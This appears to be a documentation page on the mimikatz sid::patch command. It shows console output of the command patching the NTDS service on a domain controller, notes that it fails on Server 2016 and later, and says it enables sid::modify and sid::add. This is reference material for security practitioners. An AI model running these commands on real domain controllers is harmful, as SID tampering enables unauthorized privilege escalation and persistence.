patch

Attempting sid::patch on a Windows domain controller 2016 and above will result in the following error.

mimikatz # sid::patch
Patch 1/2: "ntds" service patched
Patch 2/2: ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000057)

Dliv3 has reported a similar situation on a Windows Server 2019.

At the time of writing (January 13th, 2023), there is no known fix to this.

sid::patch can be used to patch the NTDS (NT Directory Services). It's useful when running sid::modify or sid::add.

mimikatz # sid::patch
Patch 1/2: "ntds" service patched
Patch 2/2: "ntds" service patched

Last updated 2 years ago